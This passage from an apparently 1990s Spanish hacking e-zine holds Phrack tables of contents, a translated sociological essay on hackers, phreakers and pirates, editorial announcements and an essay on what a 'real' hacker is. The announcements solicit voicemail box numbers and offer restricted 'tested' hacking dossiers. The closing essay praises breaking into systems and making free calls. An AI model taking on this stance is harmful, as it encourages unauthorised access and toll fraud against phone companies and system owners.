 9. Information About NT's FMT-150/B/C/D by StaTiC                         22K
10. Electronic Telephone Cards (Part I)                                    39K
11. Electronic Telephone Cards (Part II)                                   66K
12. Keytrap Revisited by Sendai                                            13K
13. Project Neptune by Daemon9                                             52K
14. IP-Spoofing Demystified by Daemon9 *                                   25K
15. Netmon by Daemon9                                                      21K
16. The Truth...and Nothing but the Truth by Steve Fleming                 19K
17. International Scenes by Various Sources                                33K
18. Phrack World News by Datastream Cowboy                                 21K
                                                             Total:       633K


                              -= Phrack 49 =-

 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction                                                           07K
 2. Phrack loopback                                                        06K
 3. Line Noise                                                             65K
 4. Phrack Prophile on Mudge by Phrack Staff                               08K
 5. Introduction to Telephony and PBX systems by Cavalier                 100K
 6. Project Loki: ICMP Tunneling by daemon9/alhambra                       10K
 7. Project Hades: TCP weaknesses by daemon9 *                             38K
 8. Introduction to CGI and CGI vulnerabilities by G. Gilliss *            12K
 9. Content-Blind Cancelbot by Dr. Dimitri Vulis                           40K
10. A Steganography Improvement Proposal by cjm1                           06K
11. South Western Bell Lineman Work Codes by Icon                          18K
12. Introduction to the FedLine software system by Parmaster               19K
13. Telephone Company Customer Applications by Voyager                     38K
14. Smashing The Stack For Fun And Profit by Aleph1                        66K
15. TCP port Stealth Scanning by Uriel *                                   32K
16. Phrack World News by Disorder                                         109K
                                                               Total:     575K

                                                         el Duke de Sicilia




ͻ
 08. HACKERS, PHREACKERS Y PIRATAS                                         
ͼ


Texto presentado en la conferencia de la Midwest American Culture / 
Popular Culture Association realizada el 5 de noviembre de 1977 en la 
Universidad de Bowling Green State.


------------------------------------------------------------------------------

               Hackers, phreakers y piratas por Gordon Meyer

------------------------------------------------------------------------------


El avance de la era informatica ha introducido nuevos terminos en el 
vocabulario de cada dia. Una de estas palabras, hacker, tiene que ver 
con los delitos informaticos. Todos estamos familiarizados con las 
historias de chavales que consiguen entrar en las corporaciones 
informatizadas. Pero tengo la impresion de que el termino "hacker" es 
uno de los peor entendidos, aplicados y, por tanto, usados en la era 
informatica. Considerando la cantidad de terminos tecnicos que la 
informatica nos ha traido, esto parece ser una exageracion, pero 
permitanme explicarme. 

La cultura popular define a los hackers como aquellos que, con ayuda de 
sus conocimientos informaticos consiguen acceder a los ordenadores de 
los bancos y de los negociados del gobierno. Bucean por informacion que 
no les pertenece, roban software caro y realizan transacciones de una 
cuenta bancaria a otra. 

Los criminologos, por otra parte, describen a los hackers en terminos 
menos halageos. Donn Parker los denomina "violadores electronicos" y 
August Bequai los describe como "vandalos electronicos". Ambos, aunque 
aseveran que las actividades de los hackers son ilegales, eluden 
habilmente llamarlos "criminales informaticos". Hacen una clara 
distincion entre el hacker que realiza sus actividades por diversion y 
el empleado que de repente decide hacer algo malo. 

Por tanto, parece que tenemos una definicion en la que caben dos 
extremos: por un lado, el moderno ladron de bancos y por otro el chaval 
inquieto. Ambas actividades (y todas las intermedias) son calificadas 
con el mismo termino. Dificilmente se podria considerar esto como un 
ejemplo de conceptualizacion precisa. 

Una gran parte de esta ambigedad puede seguirse desde el origen durante 
estos aproximadamente 20 aos de vida del mencionado termino. El termino 
comenzo a usarse aplicandolo a un grupo de pioneros de la informatica 
del MIT, a principios de la decada de 1960. Desde entonces, y casi hasta 
finales de la decada de 1970, un hacker era una persona obsesionada por 
conocer lo mas posible sobre los sistemas informaticos. Los diseadores 
del ordenador Apple, Jobs y Wozniack, pueden considerarse hackers en 
este sentido de la palabra. 

Pero a principios de la decada de 1980, influenciados por la difusion de 
la pelicula Juegos de Guerra, y el ampliamente publicado arresto de una 
"banda de hackers" conocida como la 414, los hackers pasaron a ser 
considerados como chicos jovenes capaces de violar sistemas informaticos 
de grandes empresas y del gobierno. Desgraciadamente, los medios de 
informacion y la comunidad cientifica social no ha puesto mucho esfuerzo 
por variar esta definicion. 

El problema para llegar a una definicion mas precisa radica, tanto en la 
poca informacion que hay sobre sus actividades diaria, como en el hecho 
de que lo que se conoce de ellos no siempre cabe bajo las etiquetas de 
los delitos conocidos. Es decir, no hay una definicion legal que sea 
aplicable a los hackers, ni todas sus actividades conllevan la violacion 
de las leyes. Esto lleva a que la aplicacion del termino varie segun los 
casos, dependiendo de los cargos que se puedan imputar y no a raiz de un 
claro entendimiento de lo que el termino significa. 

Este problema, y la falta de entendimiento de lo que significa ser un 
hacker, convierte a esta en una etiqueta excesivamente utilizada para 
aplicar a muchos tipos de intrusiones informaticas. Parker y Bequai, dos 
lideres en el estudio de los delitos informaticos, utilizan el termino 
"hacker" de formas ligeramente diferentes. Parker reconoce que hacking no 
abarca todo el rango de actividades asociadas a la violacion de los 
sistemas informaticos, pero lo prefiere al termino "phreaking", que 
considera muy oscuro. Por otra parte, Bequai no rechaza el termino 
"phreaking" y a menudo lo aplica a hechos que Parker califica como de 
hacker. Bequai confunde aun mas el termino al definir al hacker como 
alguien que utiliza ilegalmente las tarjetas de credito telefonico para 
acceder a sistemas que distribuyen software comercial ilegalmente. 
Volveremos a la definicion mas tarde, y veremos que tiene poco que ver 
con las actuaciones propias de los hackers, pero es ilustrativa de otros 
tipos de actividades informaticas inusuales. 

Este trabajo se ha obtenido en base a una investigacion etnografica del 
submundo informatico oculto. La mayor parte de la informacion se ha 
obtenido a traves de entrevistas, llevadas a cabo en vivo por mi propia 
persona, con otros participantes en algunas actividades que mas tarde 
describire. Los terminos que utilizare, "hacker", "phreaker" y "pirata" 
se presentan y definen tal y como los entienden aquellos que se 
identifican con estos papeles. Mi referencia para este trabajo ha sido 
el submundo informatico oculto, no las leyes que se han hecho para 
controlarlo. Las tipificaciones e intenciones que se formulan al final 
deben entenderse, de alguna forma, como tentativas. Este articulo 
refleja el progreso del trabajo en mi tesis doctoral, y espero reordenar 
todos estos terminos en un entorno sociologico. Estas definiciones 
basicas son un primer paso necesario para delimitar, en el sentido 
sociologico, el submundo informatico oculto. 

En primer lugar, el area de los hackers. En la tradicion de esta 
comunidad informatica, el hacker puede realizar dos tipos de 
actividades: bien acceder a un sistema informatico, o bien algo mas 
general, como explorar y aprender a utilizar un sistema informatico. En 
la primera connotacion, el termino lleva asociados las herramientas y 
trucos para obtener cuentas de usuarios validos de un sistema 
informatico, que de otra forma serian inaccesibles para los hackers. Se 
podria pensar que esta palabra esta intimamente relacionada con la 
naturaleza repetitiva de los intentos de acceso. Ademas, una vez que se 
ha conseguido acceder, las cuentas ilicitas con a veces compartidas con 
otros asociados, denominandolas "frescas". He aqui la vision 
estereotipada de los medios de comunicacion de los hackers un joven de 
menos de veinte aos, con conocimientos de informatica, pegado al 
teclado de su ordenador, siempre en busca de una cuenta no usada o un 
punto debil en el sistema de seguridad. Aunque esta vision no es muy 
precisa, representa bastante bien el aspecto del termino. 
La segunda dimension del mencionado termino se ocupa de lo que sucede 
una vez que se ha conseguido acceder al sistema cuando se ha conseguido 
una clave de acceso. Como el sistema esta siendo utilizado sin 
autorizacion, el hacker no suele tener, el terminos generales, acceso a 
los manuales de operacion y otros recursos disponibles para los usuarios 
legitimos del sistema. Por tanto, el usuario experimenta con estructuras 
de comandos y explora ficheros para conocer el uso que se da al sistema. 
En oposicion con el primer aspecto del termino, aqui no se trata solo de 
acceder al sistema (aunque alguno podria estar buscando niveles de 
acceso mas restringidos), sino de aprender mas sobre la operacion 
general del sistema. Contrariamente a lo que piensan los medios de 
comunicacion, la mayoria de los hackers no destruyen no daan 
deliberadamente los datos. El hacerlo iria en contra de su intencion de 
mezclarse con el usuario normal y atraeria la atencion sobre su 
presencia, haciendo que la cuenta usada sea borrada. Despues de gastar 
un tiempo sustancias en conseguir la cuenta, el hacker pone una alta 
prioridad para que su uso no sea descubierto. 

Ademas de la obvia relacion entre las dos acepciones, la palabra "hacker" 
se reserva generalmente a aquellos que se dedican al segundo tipo. En 
otras palabras, un hacker es una persona que tiene el conocimiento, 
habilidad y deseo de explorar completamente un sistema informatico. El 
mero hecho de conseguir el acceso (adivinando la clave de acceso) no es 
suficiente para conseguir la denominacion. Debe haber un deseo de 
liderar, explotar y usar el sistema despues de haber accedido a el. Esta 
distincion parece logica, ya que no todos los intrusos mantienen el 
interes una vez que han logrado acceder al sistema. En el submundo 
informatico, las claves de acceso y las cuentas suelen intercambiarse y 
ponerse a disposicion del uso general. Por tanto, el hecho de conseguir 
el acceso puede considerarse como la parte "facil", por lo que aquellos 
que utilizan y exploran los sistemas son los que tienen un mayor 
prestigio. 

La segunda actividad es la de los phreakers telefonicos. Se convirtio en 
una actividad de uso comun cuando se publicaron las aventuras de John 
Draper, en un articulo de la revista Esquire, en 1971. Se trata de una 
forma de evitar los mecanismos de facturacion de las compaias 
telefonicas. Permite llamar a cualquiera de cualquier parte del mundo 
sin coste practicamente. En muchos casos, tambien evita, o al menos 
inhibe, la posibilidad de que se pueda trazar el camino de la llamada 
hasta su origen, evitando asi la posibilidad de ser cogido. 
Par la mayor parte de los miembros del submundo informatico, esta es 
simplemente una herramienta para poder realizar llamadas de larga 
distancia sin tener que pagar enormes facturas. La cantidad de personas 
que se consideran phreakers, contrariamente a lo que sucede con los 
hackers, es relativamente pequea. Pero aquellos que si se consideran 
phreakers lo hacen para explorar el sistema telefonico. La mayoria de la 
gente, aunque usa el telefono, sabe muy poco acerca de el. Los phreakers, 
por otra parte, quieren aprender mucho sobre el. Este deseo de 
conocimiento lo resume asi un phreaker activo: 

"El sistema telefonico es la cosa mas interesante y fascinante que 
conozco. Hay tantas cosas que aprender. Incluso los phreakers tienen 
diferentes areas de conocimiento. Hay tantas cosas que se pueden conocer 
que en una tentativa puede aprenderse algo muy importante y en la 
siguiente no. O puede suceder lo contrario. Todo depende de como y donde 
obtener la informacion. Yo mismo quisiera trabajar para una empresa de 
telecomunicaciones, haciendo algo interesante, como programar una 
central de conmutacion. Algo que no sea una tarea esclavizadora e 
insignificante. Algo que sea divertido. Pero hay que correr el riesgo 
para participar, a no ser que tengas la fortuna de trabajar para una de 
estas compaias. El tener acceso a las cosas de estas empresas, como 
manuales, etc., debe ser grandioso". 

La mayoria de la gente del submundo no se acerca al sistema telefonico 
con esa pasion. Solo estan interesados en explorar sus debilidades para 
otros fines. En este caso, el sistema telefonico es un fin en si mismo. 
Otro entrevistado que se identificaba a si mismo como hacker, explicaba:
 
"Se muy poco sobre telefons simplemente soy un hacker. Mira, no puedo 
llamar a esos numeros directamente. Mucha gente hace lo mismo. En mi 
caso, hacer de phreaker es una herramienta, muy utilizada, pero una 
herramienta al fin y al cabo". 

En el submundo informatico, al posibilidad de actuar asi se agradece. 
Con la division del sistema Bell, llego el uso de la tarjeta de credito 
telefonica. Estas tarjetas abrieron la puerta para realizar este tipo de 
actividades a gran escala. Hoy en dia no hace falta ningun equipo 
especial. Solo un telefono con marcacion por tonos y un numero de una de 
esas tarjetas de credito, y con eso se puede llamar a cualquier parte 
del mundo. De igual forma que los participantes con mas conocimientos y 
motivacion son llamados hackers, aquellos que desean conocer el sistema 
telefonico son denominados phreakers. El uso de las herramientas que les 
son propias no esta limitada a los phreakers, pero no es suficiente para 
merecer la distincion. 

Finalmente llegamos a la "telepirateria" del software. Consiste en la 
distribucion ilegal de software protegido por los derechos de autor. No 
me refiero a la copia e intercambio de diskettes que se produce entre 
conocidos (que es igualmente ilegal), sino a la actividad que se realiza 
alrededor de los sistemas BBS que se especializan en este tipo de 
trafico. El acceso a este tipo de servicios se consigue contribuyendo, a 
traves de un modem telefonico, con una copia de un programa comercial. 
Este acto delictivo permite a los usuarios copiar, o "cargar", de tres a 
seis programas que otros hayan aportado. Asi, por el precio de una sola 
llamada telefonica, uno puede amontonar una gran cantidad de paquetes de 
software. En muchas ocasiones, incluso se evita pagar la llamada 
telefonica. Notese que al contrario que las dos actividades de hacker y 
phreaker, no hay ninguna consideracion al margen de "prestigio" o 
"motivacion" en la telepirateria. En este caso, el cometer los actos 
basta para "merecer" el titulo. 

La telepirateria esta hecha para las masas. Al contrario de lo que 
sucede con los hackers y los phreakers, no requiere ninguna habilidad 
especial. Cualquiera que tenga un ordenador con modem y algun software 
dispone de los elementos necesarios para entrar en el mundo de la 
telepirateria. Debido a que la telepirateria no requiere conocimientos 
especiales, el papel de los piratas no inspira ningun tipo de admiracion 
o prestigio en el submundo informatico. (Una posible excepcion la 
constituyen aquellos que son capaces de quitar la proteccion del 
software comercial.) Aunque los hackers y los phreakers de la 
informatica probablemente no desaprueben la pirateria, y sin duda 
participen individualmente de alguna forma, son menos activos (o menos 
visibles) en los BBS que se dedican a la telepirateria. Tienden a 
evitarlos porque la mayoria de los telepiratas carecen de conocimientos 
informaticos especiales, y por tanto son conocidos por abusar en exceso 
de la red telefonica para conseguir el ultimo programa de juegos. Un 
hacker mantiene la teoria de que son estos piratas los culpables de la 
mayoria de los fraudes con tarjetas de credito telefonicas. 
"Los medios de comunicacion afirman que son unicamente los hackers los 
responsables de las perdidas de las grandes compaias de 
telecomunicaciones y de los servicios de larga distancia. Este no es el 
caso. Nosotros (los hackers) representamos solo una pequea parte de 
estas perdidas. El resto esta causado por los piratas y ladrones que 
venden estos codigos en la calle." 

Otro hacker explica que el proceso de intercambiar grandes programas 
comerciales por modem normalmente lleva varias horas, y son estas 
llamadas, y no las que realizan los "entusiastas de telecomunicaciones", 
las que preocupan a las compaias telefonicas. Pero sin considerar la 
ausencia de conocimientos especiales, por la fama de abusar de la red, o 
por alguna otra razon, parece haber algun tipo de division entre los 
hackers / phreakers y los telepiratas. 

Despues de haber descrito los tres papeles del submundo informatico, 
podemos ver que la definicion presentada al principio, segun la cual un 
hacker era alguien que usaba una tarjeta de credito telefonico robada 
para cargar alguno de los ultimos juegos, no refleja las definiciones 
dadas en el propio submundo informatico. Obviamente, corresponde a la 
descripcion de un telepirata y no a las acciones propias de un hacker o 
un phreaker. 

En todo esto hay una serie de avisos. No quiero dar la impresion de que 
un individuo es un hacker, un phreaker o un telepirata exclusivamente. 
Estas categorias no son mutuamente excluyentes. De hecho, muchos 
individuos son capaces de actuar en mas de uno de estos papeles. Dada 
esta multiplicidad de papeles, como podemos los sociologos, periodistas 
e investigadores encontrar definiciones precisas para aplicar a las 
actividades encontradas en casos especificos? Creo que la respuesta se 
encuentra en buscar los objetivos que se han expuesto previamente. 
Recuerdese que el objetivo de un hacker no es entrar en un sistema, sino 
aprender como funciona. El objetivo de un phreaker no es realizar 
llamadas de larga distancia gratis, sino descubrir lo que la compaia 
telefonica no explica sobre su red y el objetivo de un telepirata es 
obtener una copia del software mas moderno para su ordenador. Asi, 
aunque un individuo tenga un conocimiento especial sobre los sistemas 
telefonicos, cuando realiza una llamada de larga distancia gratis para 
cargar un juego, esta actuando como un telepirata. 

En cierto modo, esto es un puro argumento semantico. Independientemente 
de que a un hacker se le etiquete erroneamente como telepirata, los 
accesos ilegales y las copias no autorizadas de software comercial van a 
seguir produciendose. Pero si queremos conocer los nuevos desarrollos de 
la era informatica, debemos identificar y reconocer los tres tipos de 
actividades con que nos podemos encontrar. El agrupar los tres tipos 
bajo una sola etiqueta es mas que impreciso, ignora las relaciones 
funcionales y diferencias entre ellos. 

Hay que admitir, de todas formas, que siempre habra alguien que este en 
desacuerdo con las diferencias que se han descrito entre los grupos. En 
el desarrollo de esta investigacion, quedo de manifiesto que no los 
individuos que realizan actualmente estas actividades se ponen de 
acuerdo en cuanto a donde estan las fronteras. Las categorias y papeles, 
como se ha indicado previamente, no son mutuamente exclusivos. En 
particular, el mundo de los hackers y los phreakers estan muy 
relacionados. Pero, de la misma forma que no debemos agrupar toda la 
actividad del submundo informatico bajo la acepcion de hacker, tampoco 
debemos insistir en que nuestras definiciones sean exclusivas hasta el 
punto de ignorar lo que representan. 

Las tipologias que he presentado son amplias y necesitan ser depuradas. 
Pero representan un paso mas en la representacion precisa, 
especificacion e identificacion de las actividades que se dan en el 
submundo de la informatica. 


*Articulo estraido de la revista electronica Cyber-Campus:

"http://arraquis.dif.um.es/~cyber" --> Revista Cyber-Campus

os recomiendo que le echeis un vistazo.




ͻ
 09. ANUNCIOS, PETICIONES, ETC...                                          
ͼ


1. Ahora que la revista empieza a rodar por ahi, algunos mencionan mi nombre 
(Incluso aparezco en algunos buscadores, guau) y muchos se confunden. No soy
muy quisquilloso con eso, pero me apodo eljaker, todojunto y con k. No es
que sea algo muy importante, pero mola ver tu nombre bien escrito por ahi. 
recordad (-: ELJAKER :-)

2. Sigo necesitando colaboradores, en aspectos como los virus, el phreacking,
etc... A ver si alguien se anima.

3. No os corteis, estamos avidos de articulos, cualquiera que nos mandeis
seguro que lo publicamos.

4. Acaban de salir los dos primeros Expedientes secretos de los saqueadores.
Estos expedientes contienen metodos de hacking, explicitos y comprobados,
explicando con detalle tecnicas concretas de hacking. Explican con todo 
detalle tecnicas reales y que funcionan en los sistemas actuales, 
comprobados por los miembros de nuestro equipo. Devido a su contenido,
que podria ser peligroso si callese en malas manos, hemos decidido no 
distribuirlos publicamente y solo se lo daremos a nuestros
mas cercanos colaboradores y a los que nos proporcionen informaciones
valiosas y buenos articulos. 

Los dos primeros expedientes son estos:
X1 - Claves de doble uso
X2 - Analisis completo y hacking del ftp-daemon (En preparacion)


5. Teniamos una exclusiva que era una bomba, pero por problemas tecnicos
no hemos podido acabarla para este numero. Para terminarlo necesitamos
vuestra colaboracion, y os pedimos que nos envies numeros de telefono de 
buzones de voz, fonobuzones o contestadores multiples que conozcais.


6. El numero pasado, anunciabamos la salida de una nueva publicacion
en castellano que trataba estos mismos temas, la TYHS. Tambien deciamos 
que esto se movia, pues es verdad, acaban de salir dos mas, tambien muy
completas y prometedoras. Son la WEB-HACK y la CYBER-HACK. Tal vez en
proximos numeros hagamos una comparativa de ellas. 


7. Debido al fastidioso lapso de los examenes de febrero, el grupo se
disolvera temporalmente. Para asuntos muy urgentes podeis acudir a
warezzman. Sera solo un mes, no os preocupeis. Podeis seguir dejando
mensajes, pero tardaremos algo en contestarlos.


8. Necesitamos informacion sobre el sistema telefonico espaol, en
aspectos como el caller-id, codigos de prefijo (Ej. *XX), traceo
de llamadas, centralitas digitales y analogicas, desvio de llamadas,
bloqueo de llamadas, llamadas anonimas, etc... Ya se que es dificil y
que la telefonica es muy dura, pero macho, algo hay que hacer para
remediarlo.


9. Leyendo las otras revistas en castellano sobre hacking, hemos visto
que nos llaman "la competencia", yo no lo veo asi, en realidad teniamos
que colaborar y ayudarnos. Yo estoy dispuesto a ayudar y a recibir ayuda
y me ofrezco para escribir un articulo en alguna de ellas, si sus
editores quieren.


10. Se estan pensando nuevas secciones de la revista, como humor,
noticias, cotilleos, entrevistas, etc... decirnos que opinias de ellas
y si quereis que las incluyamos en proximos numeros.
           



ͻ
 10. SER O NO SER HACKER?                                                 
ͼ


Ser o no ser hacker? Por Francisco Jose Hurtado

Un amigo me pregunto que me interesaba y cuando dije que los 
ordenadores, me pregunto que sistemas operativos manejaba. Tras nombrar 
los pocos que conocia, me pregunto: eres un hacker? 
Bueno, esa pregunta ha estado dandome vueltas en la cabeza hasta ahora. 
Que es exactamente un hacker?, un hacker real? 

Para aquellos que no saben de que va el tema, las noticias en los medios 
de comunicacion (y a veces los comics) han sacado las cosas de traste 
Un hacker, sin tener mucha idea, puede ser desde un usuario de 
ordenador, hasta alguien que destruye todo lo que encuentra a su paso en 
un terminal de ordenador. 

Algunos idiotas, se dedicaban, hace unos aos, a comprar un ordenador 
por Navidades, con un modem, y sacar informacion interesante, como 
juegos, datos, etc. de todo tipo de empresas y borrarlos o venderlos 
(ahora esos suelen estar en esas mismas empresas porque esa es la unica 
manera de mantenerlos callados sobre lo que encontraron en los 
ficheros). Ahora bien, de quien es la culpa? Pues de los hackers. Y 
esto tal vez sea porque a los medios de comunicacion de les suena bien 
la palabra, aunque me temo que solo una infima minoria sepa el 
significado correcto de la palabra. No busqueis en el diccionario, 
porque no tiene nada que ver con acuchillar o cortar. 
  
Los verdaderos hackers son inteligentes, tienen que serlo Puede ser 
que vayan muy bien en la Facultad, porque no tienen nada mas que hacer; 
o bien, que no les vaya nada bien, porque les parezca aburrida. Los que 
se aburren, es porque no les interesa aprender lo que en la Facultad les 
puedan ensear. Un verdadero hacker quiere aprender cosas nuevas, y como 
les ensean siempre lo mismo, una y otra vez, una y otra vez, pues 
terminan aburriendose. 

Los verdaderos hackers son curiosos y pacientes. Si no fuesen 
pacientes, terminarian por hartarse de querer entrar en el mismo sistema 
una y otra vez, asi que lo dejarian por perdido. 
Un verdadero hacker NO se mete en el sistema para borrarlo todo o para 
vender lo que consiga a otros. Los verdaderos hackers, quieren aprender, 
o quieren satisfacer su curiosidad, esa es la unica finalidad de 
introducirse en el sistema. Lo que quieren es buscar dentro de un lugar 
en el que nunca han estado, explorar todos los pequeos rincones de un 
mundo diferente del que ya conocen y que les aburre. Porque destruir 
algo y perderse el placer de decir a los demas que hemos estado en un 
lugar donde ellos no han estado? Porque destruir todo el mundo de la 
mayoria de hackers que solo cogen informacion por puro placer y exploran 
por lo mismo? 

Los hackers son inconformistas, porque pagar por unas llamadas de 
telefono que cuestas pesetas, miles de pesetas? Porque pagar por una 
informacion que solo vamos a nombrar una vez en nuestra vida, por 
ejemplo, un fichero de historia?  
       
Los hackers son discretos, quiero decir que cuando entran en un sistema 
es para su propia satisfaccion, no van por ahi cantandolo a los cuatro 
vientos. La mayoria de los casos de "hackers" que conocemos por la 
prensa son en realidad "fantasming", con lo que quiero decir, que si tu 
le dices a un amigo que has entrado en cierto sistema, de boca en boca 
ira pasando hasta que termine por saberse que tu habias entrado en un 
sistema cinco veces mayor (por el ruido de los canales de comunicacion), 
que habias destruido miles de ficheros y que habias inutilizado en 
sistema. Por eso es mejor mantener la boca cerrada. 

Llamar gratis y entrar en un sistema que no has visto antes son dos de 
las experiencias mas excitantes conocidas por el hombre, pero es una 
actividad que no seria posible de no ser por el phreaking (deporte 
consistente en hacer llamadas de telefono utilizando herramientas de 
hardware y software para engaar a la compaia telefonica y que no nos 
cobre las llamadas). 

Honestamente, no se si a alguien le gustara este texto, o si le servira 
para aclarar un poco sus ideas (a lo mejor se las enredo un poco mas), 
pero espero que alguien entienda lo que es realmente un hacker. 
Y a todos esos a quienes les gusta calificarse de "hackers": "a ver si 
crecemos un poquito?". 

Si quereis un fichero que pueda cambiar vuestro modo de ver el mundo de 
los hackers, los crackers y los phreakers: "The Hacker's Manifesto". 
Buscadlo en La Red, por alguno de los archiconocidos buscadores, ya sea 
el www.lycos.com, el www.webcrawler.com, www.yahoo.com, o cualquier 
otro. 

"Raw Data for Raw Nerves"


*Articulo estraido de la revista electronica Cyber-Campus:

"http://arraquis.dif.um.es/~cyber" --> Revista Cyber-Campus

os recomiendo que le echeis un vistazo.




ͻ
 11. DESPEDIDA                                                             
ͼ


Solo nos quedan fuerzas para decir, adios....

                                                                el grupo

















